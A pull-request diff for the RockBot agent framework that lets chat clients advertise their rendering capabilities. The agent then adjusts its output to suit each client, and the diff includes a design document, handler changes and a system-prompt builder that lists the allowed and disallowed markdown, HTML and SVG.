### PR TITLE
Let clients advertise rendering capabilities so the agent can scope rich output

### DIFF
--- a/Directory.Build.props
+++ b/Directory.Build.props
@@ -9,7 +9,7 @@
     <!-- Version can be overridden from the command line: -p:Version=0.3.1
          AssemblyVersion and FileVersion are derived automatically by the SDK
          (prerelease suffixes like -beta001 are stripped for assembly versions). -->
-<Version>0.11.0</Version>
+<Version>0.11.1</Version>
   </PropertyGroup>
 
   <!-- NuGet package metadata (shared across all packable projects) -->

--- a/Directory.Build.props
+++ b/Directory.Build.props
@@ -9,7 +9,7 @@
     <!-- Version can be overridden from the command line: -p:Version=0.3.1
          AssemblyVersion and FileVersion are derived automatically by the SDK
          (prerelease suffixes like -beta001 are stripped for assembly versions). -->
-<Version>0.10.66</Version>
+<Version>0.11.0</Version>
   </PropertyGroup>
 
   <!-- NuGet package metadata (shared across all packable projects) -->

--- a/design/client-rendering-capabilities.md
+++ b/design/client-rendering-capabilities.md
@@ -38,12 +38,14 @@ public enum ClientCapabilities : ulong
     None              = 0,
 
     // Text + markdown subsets (bits 0–15)
-    Text              = 1UL << 0,    // implicit floor — every client supports this
-    MarkdownBasic     = 1UL << 1,    // bold, italic, inline code, blockquotes
-    MarkdownHeadings  = 1UL << 2,    // # / ## / ###
-    MarkdownTables    = 1UL << 3,    // GFM tables
-    MarkdownCode      = 1UL << 4,    // fenced code blocks with language hint
-    LinkInline        = 1UL << 5,    // [text](url) renders as a clickable link
+    Text                  = 1UL << 0,    // implicit floor — every client supports this
+    MarkdownBasic         = 1UL << 1,    // bold, italic, inline code, blockquotes
+    MarkdownHeadings      = 1UL << 2,    // # / ## / ###
+    MarkdownTables        = 1UL << 3,    // GFM tables
+    MarkdownCode          = 1UL << 4,    // fenced code blocks with language hint
+    LinkInline            = 1UL << 5,    // [text](url) renders as a clickable link
+    MarkdownStrikethrough = 1UL << 6,    // ~~text~~ — GFM, supported by most chat platforms
+    MarkdownTaskList      = 1UL << 7,    // - [ ] / - [x] checkboxes — Markdig advanced + Teams
 
     // Rich rendering (bits 16–31)
     HtmlInline        = 1UL << 16,   // sanitized HTML inside markdown

--- a/design/client-rendering-capabilities.md
+++ b/design/client-rendering-capabilities.md
@@ -1,0 +1,387 @@
+# Client Rendering Capabilities
+
+Status: **implemented** (v1 — sanitizer + CLI strip remain as follow-ups; see "Deferred" below).
+
+## Why
+
+Today every user-facing reply the agent produces is treated as plain markdown.
+The Blazor UI renders it through Markdig (`Chat.razor:130, :154, :169, :251`); the
+CLI prints it through Spectre or a plain console; future Discord/WhatsApp/Slack/Teams
+proxies would each render it however their platform handles markdown-ish text.
+
+That floor is fine, but it leaves real value on the table. A scheduled "daily
+metrics" task could include a colored status bar or a small inline SVG chart. A
+diff-review reply could use a red/green span. An agent answering "what changed
+this week" could render a table. The Blazor pipeline already supports all of
+this — Markdig's `UseAdvancedExtensions()` passes inline HTML through, and
+`(MarkupString)` skips Blazor's HTML encoding — so it would render today with
+zero code changes on that path.
+
+The blocker is that the agent doesn't know **which client is going to render
+this particular reply**. Emitting `<span style="color:red">…</span>` is great
+in Blazor and ugly noise in a terminal or WhatsApp message. We need a way for
+each proxy to tell the agent what it can render, and for the agent to scope
+its output accordingly.
+
+## Capability model
+
+Rendering capability is a `[Flags]` enum (`ulong`-backed) called
+`ClientCapabilities`. It rides on the bus as a single integer — STJ defaults
+to numeric enum serialization (no `JsonStringEnumConverter` configured in
+`MessageEnvelopeExtensions.cs:10`), so the wire footprint is ~9 JSON
+characters regardless of how many bits are set.
+
+```csharp
+[Flags]
+public enum ClientCapabilities : ulong
+{
+    None              = 0,
+
+    // Text + markdown subsets (bits 0–15)
+    Text              = 1UL << 0,    // implicit floor — every client supports this
+    MarkdownBasic     = 1UL << 1,    // bold, italic, inline code, blockquotes
+    MarkdownHeadings  = 1UL << 2,    // # / ## / ###
+    MarkdownTables    = 1UL << 3,    // GFM tables
+    MarkdownCode      = 1UL << 4,    // fenced code blocks with language hint
+    LinkInline        = 1UL << 5,    // [text](url) renders as a clickable link
+
+    // Rich rendering (bits 16–31)
+    HtmlInline        = 1UL << 16,   // sanitized HTML inside markdown
+    SvgInline         = 1UL << 17,   // inline <svg>
+    ImageAttachment   = 1UL << 18,   // out-of-band image binaries (deferred — see below)
+
+    // Platform-native UI primitives, reserved for future proxies (bits 32–47)
+    DiscordEmbed      = 1UL << 32,
+    SlackBlockKit     = 1UL << 33,
+    TeamsAdaptiveCard = 1UL << 34,
+}
+```
+
+Bit gaps between text formatting (0–15), rich rendering (16–31), and
+platform-native UI (32–47) keep growth organized. Unknown bits set by a newer
+proxy on an older agent are safely ignored by `HasFlag` / mask checks — the
+field is forward-compatible by design.
+
+Capabilities are **abstract**, not platform-specific. The vocabulary names what
+the agent is allowed to *assume the receiver can render*, not what wire format
+to emit. Discord vs. Slack vs. Teams all consume markdown, but each renders a
+different subset; the bits describe the intersection rather than the platform.
+
+### Presets
+
+Per-platform capability sets live alongside the enum, so proxies and design
+docs share one vocabulary:
+
+```csharp
+public static class ClientCapabilityPresets
+{
+    public const ClientCapabilities Cli =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode;
+
+    public const ClientCapabilities Blazor =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.HtmlInline | ClientCapabilities.SvgInline;
+
+    // Documented in advance; not used by code until those proxies ship.
+    public const ClientCapabilities WhatsApp =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Discord =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Slack =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Teams =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.ImageAttachment;
+}
+```
+
+## Two sources of capability
+
+The agent has to render replies through multiple entry points, and not all of
+them have an inbound user message to read capabilities from. Two distinct
+sources cover all cases:
+
+### Source 1 — the live user session (per-message)
+
+A new field on `UserMessage`:
+
+```csharp
+public sealed record UserMessage
+{
+    public required string Content { get; init; }
+    public required string SessionId { get; init; }
+    public required string UserId { get; init; }
+    public string? TargetAgent { get; init; }
+    public ClientCapabilities ClientCapabilities { get; init; } = ClientCapabilities.None;
+}
+```
+
+The Blazor UI sets it to `ClientCapabilityPresets.Blazor` on every send
+(`Chat.razor:488`); the CLI sets it to `ClientCapabilityPresets.Cli`
+(`ChatCommand.cs:55, :118`). Older proxies that don't set the field default to
+`None`, which falls through to the existing markdown-only behaviour.
+
+Because A2A handlers, the subagent runner, and other agent-internal entry
+points produce replies that go back to the **same** user session but don't
+have the original `UserMessage` in scope, the capability is cached in a small
+singleton:
+
+```csharp
+public sealed class SessionClientCapabilityStore
+{
+    private readonly Dictionary<string, ClientCapabilities> _byId
+        = new(StringComparer.OrdinalIgnoreCase);
+    private readonly Lock _lock = new();
+
+    public void Set(string sessionId, ClientCapabilities caps);
+    public ClientCapabilities Get(string sessionId);    // returns None if absent
+    public void Clear(string sessionId);
+}
+```
+
+Registered as a singleton in `ServiceCollectionExtensions.cs` next to the
+other host-side trackers. Lives alongside `SessionStartTracker` — same
+shape, same lifetime semantics (per-session metadata cache).
+
+`ISessionTracker` / `SessionBackgroundTaskTracker` is **not** the right home
+despite the similar key. Its entries are per-loop: `BeginSession` cancels and
+replaces, `EndSession` removes — too short-lived for capability metadata that
+needs to persist across A2A callbacks fired hours later.
+
+### Source 2 — the scheduled task definition (per-task)
+
+A scheduled task's reply audience isn't predictable at fire time. The user
+could be on a different client (or none) hours after they scheduled the task.
+The author's intent at schedule time is the only meaningful signal. A new
+field on `ScheduledTask`:
+
+```csharp
+public sealed record ScheduledTask(
+    string Name,
+    string CronExpression,
+    string Description,
+    DateTimeOffset CreatedAt,
+    DateTimeOffset? LastFiredAt = null,
+    bool RunOnce = false,
+    bool IsSystemTask = false,
+    string? Directive = null,
+    ClientCapabilities ClientCapabilities = ClientCapabilities.None);
+```
+
+The field is propagated on the dispatched `ScheduledTaskMessage` so
+`ScheduledTaskHandler` doesn't need to re-fetch from
+`IScheduledTaskStore` on every fire. The scheduling tool that creates tasks
+grows a corresponding optional parameter; when omitted, behaviour stays
+markdown-only.
+
+## Mental model
+
+| Source | Represents | Right for |
+|---|---|---|
+| `SessionClientCapabilityStore` | The user's currently-active rendering surface | Entry points the user is *actively awaiting* — A2A handlers, subagent runner |
+| `ScheduledTask.ClientCapabilities` | The task author's declared intent | Scheduled, time-fired entry points where there is no live user wait |
+
+These two signals are distinct and must not be merged. A scheduled task that
+fires hours after the user closed their browser must not replay the
+originating session's capability — that would emit HTML into whatever
+terminal the user happens to be on now. Conversely, an A2A result returning a
+few seconds later should follow the user's currently-active surface, not the
+preset of whichever subagent produced the work.
+
+## Read sites
+
+Each entry point passes capabilities into `AgentContextBuilder.BuildAsync(...)`
+via a new optional parameter:
+
+```csharp
+public async Task<List<ChatMessage>> BuildAsync(
+    string sessionId,
+    string currentUserContent,
+    CancellationToken ct,
+    string? workingMemoryNamespace = null,
+    string? systemPromptOverride = null,
+    ClientCapabilities clientCapabilities = ClientCapabilities.None);
+```
+
+| Entry point | File | Source |
+|---|---|---|
+| `UserMessageHandler.HandleAsync` | `UserMessageHandler.cs:73` | `message.ClientCapabilities` directly (and writes to stash for downstream entry points) |
+| `A2ATaskResultHandler` | `A2ATaskResultHandler.cs:338` | `store.Get(rawSessionId)` derived from `pending.PrimarySessionId` |
+| `A2ATaskStatusHandler` / `A2ATaskErrorHandler` | `A2ATaskStatusHandler.cs:128`, `A2ATaskErrorHandler.cs:132` | same as above |
+| `SubagentRunner` (LLM call site) | `SubagentRunner.cs:203` | `store.Get(primarySessionId)` — covers the subagent's progress and completion bubbles, which bypass the primary's LLM |
+| `ScheduledTaskHandler` | `ScheduledTaskHandler.cs:126` | `message.ClientCapabilities` (from the task definition) — **does not consult the stash** |
+
+`ClearContextHandler.HandleAsync` (`ClearContextHandler.cs:19`) calls
+`store.Clear(message.SessionId)` alongside the existing
+`conversationMemory.ClearAsync(...)` so a fresh start drops the cached
+capability and the next inbound `UserMessage` re-establishes it.
+
+## Prompt-builder helper
+
+The capability set is translated into a small system-prompt snippet at the
+agent, never on the wire. A helper centralizes the translation so that adding
+new bits (and new platforms) touches one file:
+
+```csharp
+public static class ClientCapabilityPromptBuilder
+{
+    public static string? Build(ClientCapabilities caps)
+    {
+        if ((caps & ClientCapabilityMasks.AnyMeaningful) == 0)
+            return null;    // None / bare Text / unknown-bits-only → default markdown behaviour
+
+        var allow = new List<string>(8);
+        var deny = new List<string>(8);
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            allow.Add("**bold**, *italic*, `inline code`, and blockquotes");
+        else
+            deny.Add("any markdown formatting — emit plain text only");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownHeadings))
+            allow.Add("`#` / `##` / `###` headings");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("headings — the client renders `#` as a literal character");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownTables))
+            allow.Add("GFM-style tables (`| col | col |`)");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("tables — present tabular data as a bulleted or numbered list");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownCode))
+            allow.Add("fenced code blocks with a language hint");
+
+        if (caps.HasFlag(ClientCapabilities.LinkInline))
+            allow.Add("inline links — `[text](https://...)`");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("`[text](url)` syntax — paste bare URLs so the client auto-links them");
+
+        if (caps.HasFlag(ClientCapabilities.HtmlInline))
+        {
+            allow.Add(
+                "a safe subset of inline HTML embedded in markdown for color or structure: " +
+                "`<span style=\"color:#...\">…</span>`, `<table>`, `<details><summary>…</summary>…</details>`");
+            deny.Add(
+                "`<script>`, `<iframe>`, `<style>`, event handlers, or external `<img src>` to " +
+                "untrusted hosts (the client sanitizer strips these anyway)");
+        }
+
+        if (caps.HasFlag(ClientCapabilities.SvgInline))
+            allow.Add("inline `<svg>` for simple charts (no `<script>`, keep under ~500 lines)");
+
+        if (caps.HasFlag(ClientCapabilities.ImageAttachment))
+            allow.Add("image attachments (PNG/JPEG) when a rendered chart conveys more than prose");
+
+        // ... assemble allow/deny lists into a single system message
+    }
+}
+
+internal static class ClientCapabilityMasks
+{
+    public const ClientCapabilities AnyMeaningful =
+        ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.HtmlInline |
+        ClientCapabilities.SvgInline | ClientCapabilities.ImageAttachment |
+        NativeUi;
+
+    public const ClientCapabilities NativeUi =
+        ClientCapabilities.DiscordEmbed | ClientCapabilities.SlackBlockKit |
+        ClientCapabilities.TeamsAdaptiveCard;
+}
+```
+
+`AgentContextBuilder` calls the builder immediately after the existing
+date/time system message (`AgentContextBuilder.cs:74-82`) and appends the
+snippet when it's non-null. When the snippet is null the agent gets no
+capability instructions and produces plain markdown — the existing default.
+
+`Enum.HasFlag` on a `ulong`-backed enum boxes both operands. Negligible at
+the once-per-turn frequency of context build, but if any hot path ever picks
+this up, replace with `(caps & X) == X`.
+
+## Proxy-side responsibility
+
+The agent always emits one canonical form: markdown, optionally with
+sanitized inline HTML and inline SVG. Translation to platform-native rendering
+happens in the proxy.
+
+- **Blazor**: pipe Markdig output through `HtmlSanitizer` (`Ganss.Xss`
+  NuGet) with an allow-list — `span`/`div` + `style` (color/background), `table`,
+  inline `svg` and shape elements; no `script`/`iframe`/`on*` handlers/external
+  `src`. The system-prompt gate is honour-system; the sanitizer is the real
+  safety boundary. Add at all four `(MarkupString)` call sites:
+  `Chat.razor:130`, `:154`, `:169`, `:251`.
+- **CLI**: tag-strip pass in `PlainConsoleFrontend.DisplayReplyAsync`, and an
+  ANSI-color translation in `SpectreConsoleFrontend` for the subset Spectre
+  supports. Becomes load-bearing once scheduled tasks legitimately produce
+  HTML — without it a user on the CLI sees raw `<span style="color:red">`
+  markup when a Blazor-author's scheduled task fires.
+- **Future Discord/WhatsApp/Slack/Teams**: each proxy translates from
+  canonical markdown to its platform format (Discord's mrkdwn variant,
+  WhatsApp's `*bold*` syntax, Slack's mrkdwn, Teams' CommonMark subset).
+  Platforms with binary image support (all four) can opt into rasterizing
+  inline SVG to PNG and attaching it — but only after the deferred
+  `AgentReply.Attachments` work below is done.
+
+## Why per-message, not per-session-negotiated
+
+A per-message capability field on every `UserMessage` costs ~9 JSON characters
+and a single dictionary lookup. The alternative — a session-start negotiation
+where the proxy advertises capabilities once and the agent caches by
+`SessionId` — is heavier (new message type, new handler, replay logic if the
+agent restarts) and offers no real benefit when the wire cost is already
+trivial. The stash exists for entry points without an inbound message in
+scope; it is **not** the primary source of truth.
+
+A second reason: a single proxy may have variable surfaces (an "interactive"
+CLI vs. a `--print` one-shot). Per-message is naturally per-surface; per-session
+would need re-negotiation when the surface changes.
+
+## Deferred
+
+These are deliberately out of scope for v1:
+
+- **`AgentReply.Attachments`** — needed for `ImageAttachment` capability to do
+  anything end-to-end. Real refactor (new field, proxy support for binary
+  payloads in each platform). Defer until a proxy that can use it ships.
+- **Platform-native UI emission** — `DiscordEmbed` / `SlackBlockKit` /
+  `TeamsAdaptiveCard` bits are reserved in the enum but no tooling produces
+  them. Adding them is opportunistic upgrade work in each proxy (e.g., a
+  Discord proxy detecting a heading + body + table and rendering as an
+  embed). Agent stays format-agnostic; proxy decides.
+- **`SavedResponseTools`** for agent-callable saved-response writes. The
+  `ISavedResponseStore` and four message handlers exist
+  (`SaveResponseRequestHandler.cs:10` explicitly says "deterministic — no LLM
+  invocation"), but no `AIFunction`-backed tool is registered today. The
+  only sender of `SaveResponseRequest` is the Blazor UI's save button
+  (`Chat.razor:625`). Adding `save_response` as an LLM tool would unlock the
+  "scheduled chart task saves rich output, sends short notice on broadcast,
+  user reads it later from any capable client" pattern. Defer until the
+  "I missed the chart because I was on CLI when the patrol fired" pain
+  actually shows up.
+- **Per-schedule audience filter / targeted delivery** — only send a
+  scheduled reply to proxies whose declared capability set matches the task's.
+  Possible but requires the broadcast topic to carry capability metadata and
+  each proxy to filter on receive. Probably never needed if the saved-responses
+  flow above lands first.
+
+## Open question
+
+When a subagent fans out to multiple subagents that each fan out further,
+which session's capability flows down? The current design says: every subagent
+inherits its primary's capability (looked up by `primarySessionId`). That's
+correct for the deep-tree case because the eventual completion bubble flows
+to the same user, but it means a subagent's `system` prompt could carry HTML
+permission even when the subagent is doing pure machine-to-machine work
+(producing structured output another subagent will parse). Not a correctness
+problem — the subagent's output goes through the primary's synthesis pass
+before reaching the user — but it's wasted prompt tokens. Worth revisiting if
+subagent prompt budget ever becomes tight.

--- a/src/RockBot.A2A/A2ATaskErrorHandler.cs
+++ b/src/RockBot.A2A/A2ATaskErrorHandler.cs
@@ -29,6 +29,7 @@ internal sealed class A2ATaskErrorHandler(
     IConversationMemory conversationMemory,
     A2ATaskTracker tracker,
     AgentNameHolder agentNameHolder,
+    SessionClientCapabilityStore clientCapabilityStore,
     ILogger<A2ATaskErrorHandler> logger) : IMessageHandler<AgentTaskError>
 {
     private string DisplayName => agentNameHolder.DisplayName ?? agent.Name;
@@ -97,7 +98,8 @@ internal sealed class A2ATaskErrorHandler(
             ct);
 
         var chatMessages = await agentContextBuilder.BuildAsync(
-            rawSessionId, syntheticUserTurn, ct);
+            rawSessionId, syntheticUserTurn, ct,
+            clientCapabilities: clientCapabilityStore.Get(rawSessionId));
 
         var sessionWorkingMemoryTools = new WorkingMemoryTools(workingMemory, sessionNamespace, logger);
         var sessionSkillTools = new SkillTools(skillStore, llmClient, logger, rawSessionId);

--- a/src/RockBot.A2A/A2ATaskResultHandler.cs
+++ b/src/RockBot.A2A/A2ATaskResultHandler.cs
@@ -39,6 +39,7 @@ internal sealed class A2ATaskResultHandler(
     AgentNameHolder agentNameHolder,
     InputRequiredHandler inputRequiredHandler,
     A2AOptions a2aOptions,
+    SessionClientCapabilityStore clientCapabilityStore,
     ILogger<A2ATaskResultHandler> logger) : IMessageHandler<AgentTaskResult>
 {
     private string DisplayName => agentNameHolder.DisplayName ?? agent.Name;
@@ -308,7 +309,8 @@ internal sealed class A2ATaskResultHandler(
             ct);
 
         var chatMessages = await agentContextBuilder.BuildAsync(
-            rawSessionId, syntheticUserTurn, ct);
+            rawSessionId, syntheticUserTurn, ct,
+            clientCapabilities: clientCapabilityStore.Get(rawSessionId));
 
         var sessionWorkingMemoryTools = new WorkingMemoryTools(workingMemory, sessionNamespace, logger);
         var sessionSkillTools = new SkillTools(skillStore, llmClient, logger, rawSessionId);

--- a/src/RockBot.A2A/A2ATaskStatusHandler.cs
+++ b/src/RockBot.A2A/A2ATaskStatusHandler.cs
@@ -30,6 +30,7 @@ internal sealed class A2ATaskStatusHandler(
     IConversationMemory conversationMemory,
     A2ATaskTracker tracker,
     AgentNameHolder agentNameHolder,
+    SessionClientCapabilityStore clientCapabilityStore,
     ILogger<A2ATaskStatusHandler> logger) : IMessageHandler<AgentTaskStatusUpdate>
 {
     private string DisplayName => agentNameHolder.DisplayName ?? agent.Name;
@@ -93,7 +94,8 @@ internal sealed class A2ATaskStatusHandler(
             ct);
 
         var chatMessages = await agentContextBuilder.BuildAsync(
-            rawSessionId, syntheticUserTurn, ct);
+            rawSessionId, syntheticUserTurn, ct,
+            clientCapabilities: clientCapabilityStore.Get(rawSessionId));
 
         var sessionWorkingMemoryTools = new WorkingMemoryTools(workingMemory, sessionNamespace, logger);
         var sessionSkillTools = new SkillTools(skillStore, llmClient, logger, rawSessionId);

--- a/src/RockBot.Agent/ClearContextHandler.cs
+++ b/src/RockBot.Agent/ClearContextHandler.cs
@@ -12,6 +12,7 @@ namespace RockBot.Agent;
 internal sealed class ClearContextHandler(
     IConversationMemory conversationMemory,
     ISessionTracker sessionTracker,
+    SessionClientCapabilityStore clientCapabilityStore,
     IMessagePublisher publisher,
     AgentIdentity agent,
     ILogger<ClearContextHandler> logger) : IMessageHandler<ClearContextRequest>
@@ -26,6 +27,10 @@ internal sealed class ClearContextHandler(
 
         // Clear conversation memory (ephemeral turns only — logs are preserved)
         await conversationMemory.ClearAsync(message.SessionId, ct);
+
+        // Drop the cached client capabilities so the next inbound UserMessage re-establishes
+        // them from scratch — important if the user returns on a different client.
+        clientCapabilityStore.Clear(message.SessionId);
 
         logger.LogInformation("Cleared conversation context for session {SessionId}", message.SessionId);
 

--- a/src/RockBot.Agent/ScheduledTaskHandler.cs
+++ b/src/RockBot.Agent/ScheduledTaskHandler.cs
@@ -43,8 +43,14 @@ internal sealed class ScheduledTaskHandler(
         // across patrol runs. Pass the task description as the user content for BM25 recall.
         // workingMemoryNamespace must be passed explicitly because sessionId is "patrol/{name}",
         // not a raw session ID — without it the context builder would look in "session/patrol/{name}".
+        //
+        // Capabilities come from the task definition, not the live-session stash: scheduled
+        // tasks fire at unpredictable times when the user may be on any client (or none), so
+        // author-time intent is the only meaningful signal.
         var chatMessages = await agentContextBuilder.BuildAsync(
-            sessionId, message.Description, ct, workingMemoryNamespace: sessionId);
+            sessionId, message.Description, ct,
+            workingMemoryNamespace: sessionId,
+            clientCapabilities: message.ClientCapabilities);
 
         // If a task-specific directive file exists (e.g. heartbeat-patrol.md), inject it
         // as a system message immediately after the main system prompt (index 1).

--- a/src/RockBot.Agent/UserMessageHandler.cs
+++ b/src/RockBot.Agent/UserMessageHandler.cs
@@ -48,6 +48,7 @@ internal sealed class UserMessageHandler(
     AgentContextBuilder agentContextBuilder,
     ISessionTracker sessionTracker,
     SessionStartTracker sessionStartTracker,
+    SessionClientCapabilityStore clientCapabilityStore,
     IOptions<AgentProfileOptions> profileOptions,
     IWipTracker wipTracker,
     AgentNameHolder agentNameHolder,
@@ -79,6 +80,12 @@ internal sealed class UserMessageHandler(
             ? (string)id : null;
 
         userActivityMonitor.RecordActivity();
+
+        // Cache the client's advertised rendering capabilities so other entry points
+        // producing replies for this session (A2A handlers, subagent runner) can honour
+        // them without the originating UserMessage in scope. Last-writer-wins handles
+        // a user switching clients mid-conversation.
+        clientCapabilityStore.Set(message.SessionId, message.ClientCapabilities);
 
         // Cancel any background loop still running for this session from a prior message.
         // This prevents stale tool calls (e.g. sending an email from a previous topic)
@@ -140,7 +147,9 @@ internal sealed class UserMessageHandler(
             }
 
             // Build context using shared builder
-            var chatMessages = await agentContextBuilder.BuildAsync(message.SessionId, message.Content, ct);
+            var chatMessages = await agentContextBuilder.BuildAsync(
+                message.SessionId, message.Content, ct,
+                clientCapabilities: message.ClientCapabilities);
             var postInjectionTokenEstimate = EstimateContextTokens(chatMessages);
             HostDiagnostics.TurnContextTokens.Record(postInjectionTokenEstimate, tierTag);
 

--- a/src/RockBot.Host.Abstractions/RockBot.Host.Abstractions.csproj
+++ b/src/RockBot.Host.Abstractions/RockBot.Host.Abstractions.csproj
@@ -15,6 +15,7 @@
 
   <ItemGroup>
     <ProjectReference Include="..\RockBot.Messaging.Abstractions\RockBot.Messaging.Abstractions.csproj" />
+    <ProjectReference Include="..\RockBot.UserProxy.Abstractions\RockBot.UserProxy.Abstractions.csproj" />
   </ItemGroup>
 
 </Project>

--- a/src/RockBot.Host.Abstractions/ScheduledTask.cs
+++ b/src/RockBot.Host.Abstractions/ScheduledTask.cs
@@ -1,3 +1,5 @@
+using RockBot.UserProxy;
+
 namespace RockBot.Host;
 
 /// <summary>
@@ -23,6 +25,13 @@ namespace RockBot.Host;
 /// and the agent updates it via the <c>update_task_directive</c> tool. Distinct from
 /// <see cref="Description"/>, which is the user-facing prompt the task fires with.
 /// </param>
+/// <param name="ClientCapabilities">
+/// Rendering capabilities the task's output should be authored for. Persists with the schedule
+/// so every fire produces the same rich-content subset regardless of who is currently connected
+/// — author-time intent rather than runtime audience. Defaults to <see cref="UserProxy.ClientCapabilities.None"/>
+/// (markdown-only). Scheduled tasks deliberately ignore the live-session capability stash
+/// because their audience is unpredictable at fire time.
+/// </param>
 public sealed record ScheduledTask(
     string Name,
     string CronExpression,
@@ -31,4 +40,5 @@ public sealed record ScheduledTask(
     DateTimeOffset? LastFiredAt = null,
     bool RunOnce = false,
     bool IsSystemTask = false,
-    string? Directive = null);
+    string? Directive = null,
+    ClientCapabilities ClientCapabilities = ClientCapabilities.None);

--- a/src/RockBot.Host.Abstractions/ScheduledTaskMessage.cs
+++ b/src/RockBot.Host.Abstractions/ScheduledTaskMessage.cs
@@ -1,3 +1,5 @@
+using RockBot.UserProxy;
+
 namespace RockBot.Host;
 
 /// <summary>
@@ -5,4 +7,14 @@ namespace RockBot.Host;
 /// </summary>
 /// <param name="TaskName">Name of the scheduled task that fired.</param>
 /// <param name="Description">Task description — the agent's instructions for this run.</param>
-public sealed record ScheduledTaskMessage(string TaskName, string Description, bool IsSystemTask = false);
+/// <param name="IsSystemTask">When true the task is a system-internal background task.</param>
+/// <param name="ClientCapabilities">
+/// Rendering capabilities authored at schedule time. Propagated from
+/// <see cref="ScheduledTask.ClientCapabilities"/> so the handler does not need to
+/// re-fetch from the store on every fire.
+/// </param>
+public sealed record ScheduledTaskMessage(
+    string TaskName,
+    string Description,
+    bool IsSystemTask = false,
+    ClientCapabilities ClientCapabilities = ClientCapabilities.None);

--- a/src/RockBot.Host/AgentContextBuilder.cs
+++ b/src/RockBot.Host/AgentContextBuilder.cs
@@ -5,6 +5,7 @@ using Microsoft.Extensions.Options;
 using RockBot.Llm;
 using RockBot.Memory;
 using RockBot.Skills;
+using RockBot.UserProxy;
 
 namespace RockBot.Host;
 
@@ -57,12 +58,19 @@ public sealed class AgentContextBuilder(
     /// Subagents use this to compose their own system prompt (preamble + subagent-specific profile
     /// documents) while still getting rules, memory recall, skills, and service hints from this builder.
     /// </param>
+    /// <param name="clientCapabilities">
+    /// Rendering capabilities of the client that will display this reply. When non-<see cref="ClientCapabilities.None"/>,
+    /// an instructional system message is injected describing the rich-content subset the agent may emit
+    /// (e.g. inline HTML for color, inline SVG for charts) and what it must avoid. Default falls through
+    /// to markdown-only behaviour for older proxies that don't advertise capabilities.
+    /// </param>
     public async Task<List<ChatMessage>> BuildAsync(
         string sessionId,
         string currentUserContent,
         CancellationToken ct,
         string? workingMemoryNamespace = null,
-        string? systemPromptOverride = null)
+        string? systemPromptOverride = null,
+        ClientCapabilities clientCapabilities = ClientCapabilities.None)
     {
         var profile = profileHolder.Profile;
         // Derive a category for prompt-hint injection (Phase 4 PromptBuilderHint).
@@ -80,6 +88,16 @@ public sealed class AgentContextBuilder(
                 "All dates and times must use this timezone. " +
                 "When any tool returns a UTC timestamp, convert it to this local timezone before using or displaying it.")
         };
+
+        // Client rendering capabilities — only injected when the caller advertised at least
+        // one opt-in beyond plain text. None / unset falls through to markdown-only default.
+        var capabilitySnippet = ClientCapabilityPromptBuilder.Build(clientCapabilities);
+        if (capabilitySnippet is not null)
+        {
+            chatMessages.Add(new ChatMessage(ChatRole.System, capabilitySnippet));
+            logger.LogInformation("Injected client capability prompt for session {SessionId} (caps={Caps})",
+                sessionId, clientCapabilities);
+        }
 
         // Active rules
         var activeRules = rulesStore.Rules;

--- a/src/RockBot.Host/ClientCapabilityPromptBuilder.cs
+++ b/src/RockBot.Host/ClientCapabilityPromptBuilder.cs
@@ -46,6 +46,12 @@ public static class ClientCapabilityPromptBuilder
         else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
             deny.Add("`[text](url)` syntax — paste bare URLs so the client auto-links them");
 
+        if (caps.HasFlag(ClientCapabilities.MarkdownStrikethrough))
+            allow.Add("strikethrough — `~~text~~`");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownTaskList))
+            allow.Add("task-list checkboxes — `- [ ]` for open items, `- [x]` for completed");
+
         // ── Rich rendering ────────────────────────────────────────────────
         if (caps.HasFlag(ClientCapabilities.HtmlInline))
         {
@@ -93,7 +99,8 @@ internal static class ClientCapabilityMasks
     public const ClientCapabilities AnyMeaningful =
         ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
         ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode |
-        ClientCapabilities.LinkInline | ClientCapabilities.HtmlInline |
+        ClientCapabilities.LinkInline | ClientCapabilities.MarkdownStrikethrough |
+        ClientCapabilities.MarkdownTaskList | ClientCapabilities.HtmlInline |
         ClientCapabilities.SvgInline | ClientCapabilities.ImageAttachment |
         NativeUi;
 

--- a/src/RockBot.Host/ClientCapabilityPromptBuilder.cs
+++ b/src/RockBot.Host/ClientCapabilityPromptBuilder.cs
@@ -1,0 +1,103 @@
+using System.Text;
+using RockBot.UserProxy;
+
+namespace RockBot.Host;
+
+/// <summary>
+/// Translates a <see cref="ClientCapabilities"/> bitfield into a system-prompt
+/// snippet that tells the agent what subset of formatting the receiving client
+/// can render. Returns <c>null</c> when the capability set carries no opt-ins
+/// beyond plain text — callers then skip prompt injection and the agent falls
+/// back to its existing markdown-by-default behaviour. Lives agent-side; the
+/// prompt text never crosses the bus.
+/// </summary>
+public static class ClientCapabilityPromptBuilder
+{
+    public static string? Build(ClientCapabilities caps)
+    {
